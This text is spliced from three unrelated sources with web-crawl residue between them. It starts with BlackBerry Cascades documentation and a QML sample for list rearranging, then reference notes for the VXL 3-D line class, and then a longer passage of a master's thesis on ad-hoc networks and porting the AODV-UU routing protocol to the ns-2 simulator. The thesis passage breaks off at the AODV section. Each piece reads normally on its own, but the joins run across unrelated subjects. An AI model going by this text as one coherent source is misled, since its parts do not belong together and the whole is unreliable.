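int main(void)
{
    setlocale(LC_CTYPE, "");              /* classification follows LC_CTYPE */

    wint_t c = L'a';
    if (iswalpha(c))
        wprintf(L"%lc is alphabetic; uppercase form: %lc\n", c, towupper(c));

    /* wctype()/iswctype() and wctrans()/towctrans() are the locale-driven
       generalisations of the fixed-name functions above */
    if (iswctype(c, wctype("alnum")))
        wprintf(L"%lc is alphanumeric\n", c);
    wprintf(L"mapped: %lc\n", (wint_t) towctrans(c, wctrans("toupper")));
    return 0;
}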
http://www.opengroup.org/onlinepubs/007908799/xsh/wctype.h.html
crawl-001
refinedweb
228
50.12
Issues when using Qt Quick Compiler (Qt 5.5.0 for Embedded) Are there tutorials on how to efficiently work with the Qt Quick Compiler? Or are there recommended coding styles to get the most advantage from it? I got the Qt Quick Compiler 3.x (later referred to as 'QtQC') running for our i.MX53 board, great (see here). But new issues occurred concerning imports in QML and the expected performance gain, not so great. Problem 1: It appears to have become necessary to put namespaces onto imports in QML files, even for files in the same folder. Otherwise some classes where not found on program start. Solution: import "../common" should be turned into something like import "../common" as Common import "./" as Local and all used classes need to be prefixed with Common.MyClassAor Local.MyClassB. After this restructuring, the program startet as if it was built without QtQC, fine. Problem 2: No notable performance gain, the program takes about two minutes (!) until it is operable, which is about the same time as without QtQC. Solution attempt: Maybe dynamic creation of objects with Loaders and 'createComponent' cause unclear dependencies during compile time and force the program to recompile all QML code behind the given URLs on program start? So I removed all occasions of those and replaced them with static instances of all needed classes, so all dependencies are clear during compile time. But still no speed-up, program still takes about two minutes to start. Any suggestions? Regards, Konstantin Dols - SGaist Lifetime Qt Champion Hi, The Qt Quick Compiler being a Licensed Feature, you should try to contact the Qt Company directly through your Qt Account page. You can also try the interest mailing list
https://forum.qt.io/topic/58208/issues-when-using-qt-quick-compiler-qt-5-5-0-for-embedded
CC-MAIN-2018-17
refinedweb
287
65.73
CodePlexProject Hosting for Open Source Software Hello! A few days ago I found this physics engine and I must say that it is incredibly good. It is easy to understand and use except for one thing, how to create water simulation! I have tried to find a simple explanation of how to do this but have not succeeded, so therefore I write here and ask how to do it. I'm using XNA 3.1 and was thinking to start with a simple question and then take one piece at a time. I want the water to have the same position, width and height of this rectangle (0,900,1920,180) This is the box that will react with the water: boxBody = BodyFactory.Instance.CreateRectangleBody (physics simulator, 190, 190, 1); boxBody.Position = new Vector2 (400, 100); boxGeom = GeomFactory.Instance.CreateRectangleGeom (physics simulator, boxBody, 190, 190); boxGeom.FrictionCoefficient = 1f; I just want to have a rectangular area at the moment and do not need any waves right now. So if anyone would help me, I'd be very grateful. / / CptBonex Hey, I've been wondering the same thing as well, specially since I happened upon this video on YouTube recently: There doesn't seem to be any official documentation/tutorials on how to do fluids/water, and I'd really like to be able to implement something simple like that video for my game at some point. Just a rectangular area, like CptBonex mentioned above, but also with the ability to have waves... Anyone have any ideas/sample code to help out with this? Many thanks in advance. Have either of you looked at the WaterSampleXNA or WaterSampleSilverlight? That should be a good example of how to get water working in your games. @ Matt: Oh ok, gotcha. Didn't know about the new examples in the latest source revision. Will take a look and hopefully work it out. Thanks! :-) @ CptBonex: In case you're still missing out, grab the latest source version of the Engine (65093) from here: and then after unpacking the files, navigate to "FarseerPhysics-65093\Samples\FP2.1\WaterSampleXNA\". Compile and run the solution to have a play around, and then check out the code to see how it works. Please let me know if this helped you. Yup, from the looks of the example (WaterSampleXNA), that's pretty much what I need, and so should make it fairly easy to integrate it within my framework. Not that I needed it immediately, but figured it would be good to get it sorted out early. Many thanks, Matt! :-) Ok i got it working but i got one smal problem. I have made a class that makes it esier to create the water and it works perfect when I set effect.view to my default matrix. and when i use my camera class matrix, then the water is being drawn whitout the alpha. why is that so and how do i fix that? 
Here is my water.draw method: public void Draw(GraphicsDevice graphicsDevice, Matrix worldMatrix, Matrix cameraMatrix, Matrix projectionMatrix) { graphicsDevice.RenderState.CullMode = CullMode.CullCounterClockwiseFace; //ScreenManager.GraphicsDevice.RenderState.FillMode = FillMode.WireFrame; // create the triangle strip CreateWaterVertexBuffer(); // set the devices vertex declaration NOTICE - the vertex type is the same as we use when we create the vertex buffer graphicsDevice.VertexDeclaration = new VertexDeclaration(graphicsDevice, VertexPositionColor.VertexElements); // create a basic effect with no pool BasicEffect effect = new BasicEffect(graphicsDevice, null); // set the effects matrix's effect.World = worldMatrix; effect.View = cameraMatrix; effect.Projection = projectionMatrix; effect.Alpha = 0.5f; // this effect supports a blending mode effect.VertexColorEnabled = true; // we must enable vertex coloring with this effect effect.Begin(); foreach (EffectPass pass in effect.CurrentTechnique.Passes) { pass.Begin(); graphicsDevice.DrawUserPrimitives(PrimitiveType.TriangleStrip, vertices, 0, waterModel.WaveController.NodeCount); pass.End(); } effect.End(); } Here is the matrix that works: cameraMatrix = Matrix.Identity; And here is my camera class and the _transform matrix that makes the alpha go away: public class Camera2d { public float _zoom; // Camera Zoom public Matrix _transform; // Matrix Transform public Vector2 _pos; // Camera Position public float _rotation; // Camera Rotation public Camera2d() { _zoom = 1.0f; _rotation = 0.0f; _pos = Vector2.Zero; } // Sets and gets zoom public float Zoom { get { return _zoom; } set { _zoom = value; if (_zoom < 0.1f) _zoom = 0.1f; } // Negative zoom will flip image } public void Rotation(float rotation) { _rotation = rotation; } // Auxiliary function to move the camera public void Move(Vector2 amount) { _pos = amount; } // Get set position public Vector2 Pos { get { return _pos; } set { _pos = value; } } public Matrix get_transformation(GraphicsDevice graphicsDevice) { _transform = Matrix.CreateTranslation(new Vector3(-_pos.X, -_pos.Y, 0)) * Matrix.CreateRotationZ(MathHelper.ToRadians(_rotation)) * Matrix.CreateScale(new Vector3(Zoom, Zoom, 0)) * Matrix.CreateTranslation(new Vector3(1920 * 0.5f, 1080 * 0.5f, 0)); return _transform; } } Help me! Camera transformations shouldn't have anything to do with whether or not alpha is enabled. Write up a quick sample app demonstrating the problem. Just comment whee you think your changes cause problems. I'll take a look and solve this problem for you. Are you sure you want to delete this post? You will not be able to recover it later. Are you sure you want to delete this thread? You will not be able to recover it later.
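One thing worth checking, offered only as a guess rather than a confirmed diagnosis: the camera matrix scales Z by 0, which makes the view matrix degenerate, and alpha blending also has to be enabled on the device render state (graphicsDevice.RenderState.AlphaBlendEnable = true, with SourceAlpha/InverseSourceAlpha blends) for effect.Alpha to have a visible effect on primitives. A sketch of the transformation with a Z scale of 1:

public Matrix get_transformation(GraphicsDevice graphicsDevice)
{
    _transform =
        Matrix.CreateTranslation(new Vector3(-_pos.X, -_pos.Y, 0)) *
        Matrix.CreateRotationZ(MathHelper.ToRadians(_rotation)) *
        Matrix.CreateScale(new Vector3(Zoom, Zoom, 1)) *   // was 0 -- a zero Z scale flattens the matrix
        Matrix.CreateTranslation(new Vector3(1920 * 0.5f, 1080 * 0.5f, 0));
    return _transform;
}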
http://farseerphysics.codeplex.com/discussions/207592
CC-MAIN-2017-26
refinedweb
864
50.63
When numbers in a given range need to be printed without using any loop, a method can be defined that calls itself recursively, decrementing the upper limit by one on each call and printing the values on the way back up. Below is the demonstration of the same −

def print_nums(upper_num):
    if(upper_num > 0):
        print_nums(upper_num - 1)
        print(upper_num)

upper_lim = 6
print("The upper limit is :")
print(upper_lim)
print("The numbers are :")
print_nums(upper_lim)

The upper limit is :
6
The numbers are :
1
2
3
4
5
6

A method named 'print_nums' is defined. It checks whether the value passed in is greater than 0. If so, it first recurses with the value decremented by 1 and then prints the value, so the numbers appear in ascending order. Outside the function, a value for the upper limit is defined, and the method is called by passing it as the parameter. The output is displayed on the console.
https://www.tutorialspoint.com/python-program-to-print-numbers-in-a-range-1-upper-without-using-any-loops
CC-MAIN-2021-39
refinedweb
142
63.19
How to run a code in lopy stored on SD card?

Dear all, I believe this is a trivial question, but I would be more than happy if you can help me to run a .py file stored on an SD card connected to the expansion board with the LoPy. I tried to find an answer in previous posts but got a bit confused.. Thank you in advance! Monika

@robert-hh great, thank you, it worked perfectly!

@monersss You have to mount the SD card first, e.g. with:

from os import mount, chdir
from machine import SD

sd = SD()
mount(sd, '/sd')

Then you can chdir into /sd:

chdir("/sd")

and import the module, or directly import

import /sd/mymodule
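Putting the answer together as a runnable sketch (mymodule is a placeholder name): note that "import /sd/mymodule" is not valid Python syntax as written; after mounting, you can either chdir into the card and import by module name, or append /sd to sys.path.

import sys
from os import mount, chdir
from machine import SD

sd = SD()
mount(sd, '/sd')

# Option 1: change into the card and import by plain module name
chdir('/sd')
import mymodule            # runs /sd/mymodule.py

# Option 2 (an assumption about what "directly import" intends):
# make the card importable from anywhere
# sys.path.append('/sd')
# import mymodule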
https://forum.pycom.io/topic/1930/how-to-run-a-code-in-lopy-stored-on-sd-card
CC-MAIN-2022-21
refinedweb
117
82.65
Goal: This tutorial shows how to set up JDK 6 and JavaFX on older Intel Macs (old means 32-bit CPUs from around 2006). The problem is that JavaFX requires JDK 6, but Apple only released the Apple JDK 6 for Mac OS X 10.5/Leopard with 64-bit CPUs. We will use the SoyLatte JDK 6 instead. The tutorial also covers how to set up the NetBeans IDE as tool for JDK 6 and JavaFX development on Mac OS X. Target group: This tutorial is for JDK 6 developers who are stuck on an older system with Requirements: Basic understanding of NetBeans, Java, and how to use the Terminal (X11.app) is required. The command line examples are for the bash shell. Optional tip from Landon Fuller: The Java homes on Macs are in the /System/Library/Frameworks/JavaVM.framework directory. The following symlinks will trick Mac OS and some other applications into using the new JDK. mkdir /System/Library/Frameworks/JavaVM.framework/Versions/1.6.0/ ln -s /System/Library/Frameworks/JavaVM.framework/Versions/1.6.0/ /System/Library/Frameworks/JavaVM.framework/Versions/1.6 ln -s /sw/soylatte16-i386-1.0.2/ /System/Library/Frameworks/JavaVM.framework/Versions/1.6.0/Home Open the X11.app and set it up to use the new JDK. Mac:$ export JAVA_HOME=/sw/soylatte16-i386-1.0.2 Mac:$ export PATH=/sw/soylatte16-i386-1.0.2/bin:$PATH Test whether you were successful: Mac:$ echo $PATH /sw/soylatte16-i386-1.0.2/bin:/sw/bin:/sw/sbin:/usr/bin: /bin:/usr/sbin:/sbin:/usr/local/bin:/usr/X11/bin:/usr/X11R6/bin Mac:$ java -version java version "1.6.0_03-p3" Java(TM) SE Runtime Environment (build 1.6.0_03-p3-landonf_03_feb_2008_02_12-b00) Java HotSpot(TM) Client VM (build 1.6.0_03-p3-landonf_03_feb_2008_02_12-b00, mixed mode) Mac:$ which java /sw/soylatte16-i386-1.0.2/bin/java Mac:$ which javac /sw/soylatte16-i386-1.0.2/bin/javac If the terminal replies with the old values /usr/bin/java or java version 1.5.0_13, go back and check whether you missed a step. Don't close this Terminal window before Completing the Set-up: Saving Settings for the Terminal. You can now use the JDK 6 from the Terminal. Below you will see how to set up the NetBeans IDE to use the JDK 6. You can skip this step if you don't develop JavaFX. If you solely want the JDK 6, continue with setting up the NetBeans IDE below. Mac:$ open "/Volumes/JavaFX SDK/javafx_sdk-1_0-pre1.mpkg" Test whether the installation was successful: Mac:$ which javafx /usr/bin/javafx Mac:$ which javafxc /usr/bin/javafxc Try to compile and run a Hello World application. Save this code as file Hello.fx import javafx.application.Frame; import javafx.application.Stage; import javafx.scene.geometry.Circle; import javafx.scene.paint.Color; Frame { title: "Hello World" width: 200 height: 200 visible: true stage: Stage { content: Circle { centerX: 100, centerY: 100 radius: 40 fill: Color.YELLOW } } } Run it in the terminal: Mac:$ javafxc Hello.fx Mac:$ ls Hello$Intf.class Hello.class Hello.fx Mac:$ javafx Hello If you see the HelloWorld application, you have successfully configured JavaFX for the Terminal. Below you will see how to set up the NetBeans IDE to develop JavaFX applications. If you want to run the NetBeans IDE 6.1 on JDK 6, start it with the following command (all on one line!) from the X11 terminal: Mac:$ /Applications/NetBeans/NetBeans\ 6.1.app/Contents/MacOS/netbeans --jdkhome /sw/soylatte16-i386-1.0.2/ --laf javax.swing.plaf.metal.MetalLookAndFeel & This forces NetBeans to run on JDK 6 and to use the Metal look and feel (because SoyLatte/X11 does not support the Apple Aqua look and feel). 
See also warnings regarding X11 below. Normally in Mac programs, the Exit, About and Options menu items are in the Application menu. With SoyLatte, all Java applications run within X11, and the application menu is owned by the X11.app. So these three important menu items are inaccessble. Thanks to Wangwj for this brilliant hack how to get the menus back: The NetBeans IDE is now ready for JDK 6 development on the Mac You can skip this step if you don't develop JavaFX. The NetBeans IDE is now ready for JavaFX development on the Mac. To make the settings permanent for the terminal, add the following lines to your ~/.bash_profile file. (The alias line must be on one line.) export JAVA_HOME=/sw/soylatte16-i386-1.0.2 export PATH=/sw/soylatte16-i386-1.0.2/bin:$PATH alias netbeans-jdk6="/Applications/NetBeans/NetBeans\ 6.1.app/Contents/MacOS/netbeans --jdkhome /sw/soylatte16-i386-1.0.2/ --laf javax.swing.plaf.metal.MetalLookAndFeel" Make the most of using an IDE: To check whether a JavaFX project is configured correctly, open the project properties and check these two things (in this order): Our custom NetBeans JDK 6 edition looks different from other Mac applications: It runs with a little help from the X11 window system. This workaround has a couple of important side-effects. --laf javax.swing.plaf.metal.MetalLookAndFeel
http://wiki.netbeans.org/JavaFXAndJDK6On32BitMacOS
CC-MAIN-2017-39
refinedweb
866
60.41
sandbox/Antoonvh/root-finding.c Root Finding Using Adaptive Grids We can find the zeros of a smooth function using adaptive grids. This can be achieved by iteratively refining arround the neighborhood where the function changes sign. Note that this algorithm is not fool proof, e.g. it can not find for . But the concept can be easily extended to work for such roots as well. Furtheremore, it migth produce floating point errors if there is a root that is a rational number. In this example we try to find the non trivial zeros of the first Bessel function of the first kind for is between zero and 20. I.e. We assume that the math library has an accurate enough definitnion of this function. #include "grid/bitree.h" #define function(x) (j1(x)) scalar f[],rf[]; int maxlevel = 19; int main(){ FILE * fp1 = fopen("j1.dat","w"); FILE * fp2 = fopen("roots.dat","w"); L0=20; X0=0.0001; N=(128); init_grid(N); foreach(){ f[]=function(x); rf[]=1/f[]; } int tot = 1; while (tot>0) { astats g = adapt_wavelet({rf},(double[]){1.},maxlevel,8); foreach(){ f[]=function(x); rf[]=1/f[]; } tot = g.nf+g.nc; } int n = 0,nn=0; foreach(){ n++; fprintf(fp1,"%g\t%g\n",x,f[]); if (level == maxlevel&&(f[]*f[1]<0)){ fprintf(ferr,"x=%.*g\n",10,(x*f[1] + (x+(L0/(pow(2,maxlevel))))*f[0])/(f[]+f[1])); fprintf(fp2,"%g\t%g\n",(x*f[1] + (x+(L0/(pow(2,maxlevel))))*f[0])/(f[]+f[1]) , 0.); } } foreach_cell() nn++; fprintf(ferr,"with error margin = %.*f\nUsed grid cells: %d or %d if you count non-leaf cells as well.\n",10,L0/pow(2,maxlevel),n,nn); } Results This Produces the following output in the terminal: x=3.831734287 x=7.015553147 x=10.17344108 x=13.32339081 x=16.47077911 x=19.6158736 with error margin = 0.0000381470 Used grid cells: 2628 or 5565 if you count non-leaf cells as well. This seems to correspond with online references down to the mentioned accuracy. We also plot the results:
http://basilisk.fr/sandbox/Antoonvh/root-finding.c
CC-MAIN-2018-43
refinedweb
350
68.97
Cedric Le Goater <clg@fr.ibm.com> writes:> I've used the ipc namespace patchset in rc6-mm2. Thanks for putting this> together, it works pretty well ! A few questions when we clone :>> * We should do something close to what exit_sem() already does to clear the> sem_undo list from the task doing the clone() or unshare().Possibly which case are you trying to prevent?> * I don't like the idea of being able to unshare the ipc namespace and keep> some shared memory from the previous ipc namespace mapped in the process mm.> Should we forbid the unshare ?No. As long as the code handles that case properly we should be fine.As a general principle we should be able to keep things from other namespacesopen if we get them. The chroot or equivalent binary is the one that needsto ensure these kinds of issues don't exist if we care.Speaking of we should put together a small test application probably similarto chroot so people can access these features at least for testing.> Small fix follows,>> thanks,>> C.Ack. For the unshare fix below. Could you resend this one separately withpatch in the subject so Andrew sees it and picks up?> From: Cedric Le Goater <clg@fr.ibm.com>> Subject: ipc namespace : unshare fix>> Signed-off-by: Cedric Le Goater <clg@fr.ibm.com>>> ---> kernel/fork.c | 3 ++-> 1 file changed, 2 insertions(+), 1 deletion(-)>> Index: 2.6.17-rc6-mm2/kernel/fork.c> ===================================================================> --- 2.6.17-rc6-mm2.orig/kernel/fork.c> +++ 2.6.17-rc6-mm2/kernel/fork.c> @@ -1599,7 +1599,8 @@ asmlinkage long sys_unshare(unsigned lon> /* Return -EINVAL for all unsupported flags */> err = -EINVAL;> if (unshare_flags & ~(CLONE_THREAD|CLONE_FS|CLONE_NEWNS|CLONE_SIGHAND|> - CLONE_VM|CLONE_FILES|CLONE_SYSVSEM|CLONE_NEWUTS))> + CLONE_VM|CLONE_FILES|CLONE_SYSVSEM|> + CLONE_NEWUTS|CLONE_NEWIPC))> goto bad_unshare_out;> > if ((err = unshare_thread(unshare_flags)))-To unsubscribe from this list: send the line "unsubscribe linux-kernel" inthe body of a message to majordomo@vger.kernel.orgMore majordomo info at read the FAQ at
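The thread mentions wanting "a small test application probably similar to chroot"; a hedged sketch of such a tool is below, assuming a libc that exposes unshare(2) and a kernel that accepts CLONE_NEWIPC (the flag this patch wires into sys_unshare). The program name and usage text are invented.

#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <unistd.h>

/* Run a command in a freshly unshared IPC namespace. */
int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s command [args...]\n", argv[0]);
        return 1;
    }
    if (unshare(CLONE_NEWIPC) == -1) {       /* requires CAP_SYS_ADMIN */
        perror("unshare(CLONE_NEWIPC)");
        return 1;
    }
    execvp(argv[1], &argv[1]);
    perror("execvp");
    return 1;
}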
http://lkml.org/lkml/2006/6/12/227
CC-MAIN-2013-48
refinedweb
328
65.62
Responding to selection You can use a ListView to only display data, and this can be a good way to present the data neatly in your app. You can also use ListView to take action when a user selects an item in the list. To respond to the selection of an item, you need to know which item was selected. Cascades uses index paths to identify list items. Index paths When you construct a data model to use in a ListView, the model typically uses a hierarchical structure. Header items might be at the first level of the model, and normal items might be nested at the second level (or further levels down in the hierarchy). When a user selects an item in the list, you need to know exactly where the data for that item is located in the data model, so you can respond to the selection appropriately. An index path represents the location of an item relative to the root item of the ListView. It's important to note that the root item of the ListView might not be the root item of the data model. The data model might contain a hierarchy that is many levels deep, but a ListView shows only the first two levels of items below its root item. You can set the item that should be used as the root item of the ListView by using the rootIndexPath property. The index path of an item is an ordered list of integers, and each integer represents an ancestor of the item. For example, for an item that is a direct child of the root item, its index path contains a single integer. For an item that is a child of that item, its index path contains two integers. The value of each integer indicates the item's ordering relative to the other children of its parent, starting at 0. For example, a value of 3 indicates that the item is the fourth child of its parent, and a value of 0 indicates that the item is the first child of its parent. To illustrate the concept of index paths, consider the following hierarchical data model. Each item in the model includes a piece of data, which is specified by the title property. The index path of each item (relative to the <root> item) is listed in square brackets. If you use a ListView to represent this data and you don't specify a value for the rootIndexPathproperty, the ListView uses the <root> element as its root item. In this case, the list items in the first two levels of the data model are displayed in the list, but the items in the third level (the level that includes "Gala" and "Butternut") aren't displayed. You can change the item that the ListView uses as its root item to alter the data that's displayed in the list. In the example above, you could specify the "Fruit" item as the root item, and then all child items of that item would be displayed in the list. The "Gala", "McIntosh", and "Empire" items would be included, because they would be at the second level relative to the new root item. Responding to selection of a single item There are two ways that you can respond to the selection of a single item in a ListView. You can perform an action immediately when a user taps a list item, or you can use a context menu for each list item to let the user select what action should be performed. Responding to selection immediately When a user taps an item in a list, the ListView emits the triggered() signal and you can use the onTriggered signal handler to respond to this signal. The signal includes an indexPath parameter that specifies the index path of the tapped item. 
After you obtain the index path of the item that was tapped, you can use it to retrieve the item's data from the data model by calling DataModel::data(). You can then access the item's properties and respond to the tap.

Here's how to create a list using an XML data model that's specified in an items.xml file. Each list item in the data model (not including header items) has a title property and a status property. The values of the title properties are displayed as the list items, and when an item is tapped, the value of that item's status property is displayed in a TextField.

    import bb.cascades 1.0

    Page {
        content: Container {
            // Create a ListView that uses an XML data model
            ListView {
                dataModel: XmlDataModel {
                    source: "models/items.xml"
                }

                // Use a ListItemComponent to determine which property in the
                // data model is displayed for each list item
                listItemComponents: [
                    ListItemComponent {
                        type: "listItem"

                        StandardListItem {
                            // Display the value of an item's title property
                            // in the list
                            title: ListItemData.title
                        }
                    }
                ]

                // When an item is selected, update the text in the TextField
                // to display the status of the new item
                onTriggered: {
                    var selectedItem = dataModel.data(indexPath);
                    textField.text = selectedItem.status;
                }
            }

            // Create a text field to display the status of the selected item
            TextField {
                id: textField
                text: ""
            }
        } // end of top-level Container
    } // end of Page

Responding to selection using the context menu

There are times when you might not want to perform an action immediately when a user taps a list item. Instead, you may want to provide a set of multiple actions for that list item that the user can choose from. For example, for a list of contacts, you might want to let the user do any of the following when they select a contact from the list:

- Send an email
- Start a chat
- Start a video conference
- Delete the contact

To provide this choice, you can add a context menu to list items. The context menu appears when a user touches and holds an item, and it contains a set of actions that apply to that item. You can add context menus to any control in Cascades, not just list items. To learn more about adding context menus to other controls, see Adding a context menu.

When a user touches and holds an item, a partial context menu is displayed. This partial menu shows only the icons that are associated with each action in the menu. The user can either select an action icon from the partial menu (at which time, that action expands to display the title of the action) or swipe the menu to the left to display the full context menu.

You can add a context menu to a list item by using the contextActions list property. This property is associated with the content that you use for the ListItemComponent of the list item. For example, consider the following simple ListView:

    ListView {
        dataModel: XmlDataModel {
            source: "models/myDataModel.xml"
        }

        listItemComponents: [
            ListItemComponent {
                type: "listItem"

                StandardListItem {
                    title: ListItemData.title
                    contextActions: [
                        // Add actions for the context menu here
                    ]
                }
            }, // end of ListItemComponent
            ListItemComponent {
                type: "specialListItem"

                Container {
                    Label { ... }
                    Label { ... }
                    contextActions: [
                        // Add actions for the context menu here
                    ]
                }
            } // end of ListItemComponent
        ] // end of listItemComponents list
    } // end of ListView

This ListView uses two ListItemComponent objects to define how list items look. In the first ListItemComponent, a StandardListItem is used for items in the data model that have a type of "listItem".
In the second ListItemComponent, a custom layout (with a Container at the root) is used for items that have a type of "specialListItem". It's inside the content of each ListItemComponent (that is, within the StandardListItem and the Container) that you include the contextActions list property.

You add actions to the context menu by using an ActionSet and filling it with ActionItem objects. Each ActionItem corresponds to an action in the context menu. Here's how to create a context menu containing four actions that apply to list items.

    import bb.cascades 1.0

    Page {
        content: Container {
            ListView {
                // Use data from an XML file as the data model
                dataModel: XmlDataModel {
                    source: "models/contacts.xml"
                }

                listItemComponents: [
                    ListItemComponent {
                        type: "listItem"

                        // For each item in the data model that has a type of
                        // "listItem", use a StandardListItem to display the item
                        StandardListItem {
                            title: ListItemData.firstname + " " + ListItemData.lastname
                            contextActions: [
                                // Add a set of four actions to the context menu for
                                // a list item
                                ActionSet {
                                    title: "Contact"

                                    ActionItem {
                                        title: "Send an Email"
                                        imageSource: "asset:///images/email.png"
                                    }
                                    ActionItem {
                                        title: "Start a Chat"
                                        imageSource: "asset:///images/chat.png"
                                    }
                                    ActionItem {
                                        title: "Start a Video Conference"
                                        imageSource: "asset:///images/video.png"
                                    }
                                    ActionItem {
                                        title: "Delete"
                                        imageSource: "asset:///images/delete.png"
                                    }
                                } // end of ActionSet
                            ]
                        } // end of StandardListItem
                    } // end of ListItemComponent
                ]
            } // end of ListView
        } // end of top-level Container
    } // end of Page

It's important to note that when a user touches and holds a list item to display the context menu for that item, the triggered() signal isn't emitted. You should make sure that you handle this behavior properly in your app. In general, when the user taps an item and the triggered() signal is emitted, your app should perform the most common action for that item. For example, tapping on an email in an email app should open the email, and tapping on a song in a music player app should play the song. Your app should include less common actions in the context menu.

Responding to selection of multiple items

In addition to performing actions on a single item in a list, you might want your app to provide actions that apply to multiple list items at once. For example, in a list of contacts, you might let users select multiple contacts and add them all to the To line of an email, set up a meeting with those contacts, or delete all of those contacts.

Cascades lets you support multiple selection in your lists with just a few lines of code. You don't need to implement the multiple selection mechanism or provide a visual appearance for the selection. Cascades handles these aspects automatically, so you simply need to do the following in your app:

- Provide an action that enables multiple selection mode
- Specify the actions that you want to include on the multiple selection menu

Enabling multiple selection mode

To enable multiple selection mode, you use a special type of action called a MultiSelectActionItem. You can add this action in different places in your app (such as the action menu or context menu), just like any other action item. A MultiSelectActionItem has a default image and text, but you can choose to customize these properties. When you create a MultiSelectActionItem, you need to associate it with a MultiSelectHandler (which you'll learn about in the next section).
This handler is associated with a ListView and contains the actions that should appear on the context menu when multiple list items are selected. When a user selects the MultiSelectActionItem, the handler is invoked and displays the multiple selection interface and the actions that you specify.

Here's how to create a MultiSelectActionItem and add it to the action menu of a Page. The MultiSelectActionItem is associated with the MultiSelectHandler of a ListView called list. In the next section, you'll learn how to populate the list's MultiSelectHandler with actions.

    import bb.cascades 1.0

    Page {
        actions: [
            MultiSelectActionItem {
                multiSelectHandler: list.multiSelectHandler
            }
        ]

        ListView {
            id: list
            dataModel: XmlDataModel {
                source: "models/contacts.xml"
            }
        }
    }

When a user enables multiple selection mode using a MultiSelectActionItem, the multiple selection interface is displayed. This interface includes a context menu on the right side of the screen, which contains actions that apply to the selected items. The interface also includes a status bar at the bottom of the screen, which contains a Cancel button (to disable multiple selection mode) and status text that you can customize. You can use the status property, which is part of MultiSelectHandler, to display this text. For example, you might want to show how many list items are currently selected.

While multiple selection mode is enabled, the user can tap list items to select them. A default visual style is used for selected list items. The user can also tap selected items to deselect them. Actions that apply to the selected items are displayed in a partial context menu, which the user can swipe or drag to display the full context menu.

Specifying actions for the multiple selection menu

To add actions to the context menu when multiple selection mode is enabled, you can use the multiSelectHandler property of a ListView. This property defines a MultiSelectHandler, which determines how multiple selection works for the ListView. Inside the multiSelectHandler property, you can use the actions list property to add ActionItem objects to the context menu.

Here's how to add actions to the context menu in multiple selection mode. This code sample includes a MultiSelectActionItem to enable multiple selection mode, and also includes a few other interesting additions that demonstrate some of the features of the mode:

- The onActiveChanged signal handler is used to handle the activeChanged() signal that's emitted by the list's MultiSelectHandler. This signal indicates when multiple selection mode is enabled or disabled, and the text of a Label is updated accordingly.
- The onSelectionChanged signal handler is used to handle the selectionChanged() signal that's emitted by the ListView. This signal indicates that a list item has been selected or deselected, and the text in the status area is updated to reflect how many items are currently selected.
- A MultiSelectActionItem is assigned to the multiSelectAction property of the ListView. When you set this property, a MultiSelectActionItem is added automatically to the context menu of each list item, meaning that you don't need to add them manually to each item. Note that each list item must include an ActionSet in order for the MultiSelectActionItem to be added to it. So, an empty ActionSet is added to the contextActions list of the StandardListItem.

    import bb.cascades 1.0

    Page {
        actions: [
            // Add an action to enable multiple selection mode. This action
            // appears in the action menu on the main Page of the app.
            MultiSelectActionItem {
                multiSelectHandler: list.multiSelectHandler
            }
        ]

        Container {
            ListView {
                id: list
                dataModel: XmlDataModel {
                    source: "models/contacts.xml"
                }

                // Set the multiSelectAction property so that an action to enable
                // multiple selection mode appears in the context menu of each
                // list item
                multiSelectAction: MultiSelectActionItem {
                }

                multiSelectHandler {
                    actions: [
                        // Add the actions that should appear on the context menu
                        // when multiple selection mode is enabled
                        ActionItem {
                            title: "Send an Email"
                            imageSource: "asset:///images/email.png"
                        },
                        ActionItem {
                            title: "Start a Chat"
                            imageSource: "asset:///images/chat.png"
                        },
                        ActionItem {
                            title: "Delete"
                            imageSource: "asset:///images/delete.png"
                        }
                    ]

                    // Set the initial status text of multiple selection mode. When
                    // the mode is first enabled, no items are selected.
                    status: "None selected"

                    // When multiple selection mode is enabled or disabled, update
                    // the label accordingly
                    onActiveChanged: {
                        if (active == true) {
                            statusLabel.text = "Multiple selection mode is enabled.";
                        } else {
                            statusLabel.text = "Multiple selection mode is disabled";
                        }
                    }
                }

                // When a list item is selected or deselected, update the status text
                // to reflect the number of items that are currently selected
                onSelectionChanged: {
                    if (selectionList().length > 1) {
                        multiSelectHandler.status = selectionList().length + " items selected";
                    } else if (selectionList().length == 1) {
                        multiSelectHandler.status = "1 item selected";
                    } else {
                        multiSelectHandler.status = "None selected";
                    }
                }

                listItemComponents: [
                    ListItemComponent {
                        type: "listItem"

                        // Use a standard list item for the visual appearance of list
                        // items that have a type of "listItem"
                        StandardListItem {
                            title: ListItemData.firstname + " " + ListItemData.lastname

                            // For a MultiSelectActionItem to be added to each list
                            // item, the items must have an ActionSet. Create an
                            // empty ActionSet to hold the action. You can also add
                            // any other actions that should appear in the context
                            // menu of a list item.
                            contextActions: [
                                ActionSet {
                                }
                            ]
                        }
                    } // end of ListItemComponent
                ]
            } // end of ListView

            Label {
                id: statusLabel
                text: "Multiple selection mode is disabled."
                textStyle {
                    base: SystemDefaults.TextStyles.SubtitleText
                }
            }
        } // end of top-level Container
    } // end of Page

Rearranging lists (BlackBerry 10.3)

Lists support rearrange mode, which allows a user to drag items in a list to rearrange them. Only lists that use a StackListLayout support rearrange mode. Lists that use a GridListLayout or a FlowListLayout ignore the request to enable rearrange mode.

While a list is in rearrange mode, grabbers are added to items in the list. Grabbers are visual overlays placed on items to indicate that they can be lifted and dragged. Grabbers are placed on top of list items, aligned right horizontally and centered vertically. Placement of a grabber is the same regardless of layout orientation.

When the user lifts an item using a grabber, the list starts a move session. During a move session, the lifted item is detached from the layout and the user can drag the item around freely. An empty space remains in the layout, indicating the previous location of the item. When the user drags a lifted item close to the edges of the list, the list starts to scroll. The scrolling speed increases as the item is dragged closer to the edge of the list.
If an item is released, or if the rearrange session is exited, the item snaps back to the location of the empty space as long as the app doesn't deny the move. When a lifted item is dragged so that it overlaps another item, the list emits a move request using a rearrange handler. In response to this signal, your app can either perform the requested move by updating the data model or choose to deny the move. If the item is moved, the empty space in the list layout (which represents the previous position of the item) is moved to the new location. If the move request is denied, the layout remains unchanged. Items can always be lifted and dragged, but no actual relocation occurs unless the data model is updated.

Because a move session is made up of many intermediate move operations, a set of signals is provided to support apps that need to handle the session as a single transaction (for example, to support an Undo feature). The signals are as follows:

- onMoveStarted() - Emitted when an item is lifted.
- onMoveEnded() - Emitted when a lifted item is released.
- onMoveAborted() - Emitted when the lifted item is released for any reason that can be seen as unintentional (for example, if the app closes while the user is dragging an item).

